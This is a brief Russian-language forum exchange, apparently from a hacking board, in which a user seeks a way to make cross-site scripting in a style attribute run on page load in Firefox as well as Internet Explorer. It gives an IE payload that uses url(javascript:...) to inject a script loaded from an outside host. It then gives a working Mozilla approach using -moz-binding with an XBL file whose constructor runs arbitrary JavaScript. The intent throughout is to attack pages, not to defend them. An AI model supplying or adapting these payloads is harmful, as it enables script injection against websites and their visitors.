Хай. По сабжу не подскажите? В IE: style="background: url(javascript:alert());", а в Мозилле, слышал про -mozilla-opacity, или как-то так.. Нужно, чтобы в Мозилле при загрузке страницы сразу исполнялась XSS в аттрибуте style..
Евгений Минаев Посмотрел этот XML, не, это жесткий метод.. сложно свободно писать Js.. Я хочю через аттрибут в стайле выполнить XSS подключающий сторонний Js-код, путём createElement..
Быть точнее. style="background: url(javascript: document.createElement('script').src='http://www.mysite.ru/myscript.js');" Это идеально для IE, тоже самое мне нужно в Мозилле, т.к. этот код не валиден Фоксу.
Подключил... Через биндинг.. CSS: -moz-binding: url("http://localhost/xml.xml#xss"); XML: <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> <binding id="xss"> <implementation> <constructor> JavaScript code... </constructor> </implementation> </binding> </bindings>
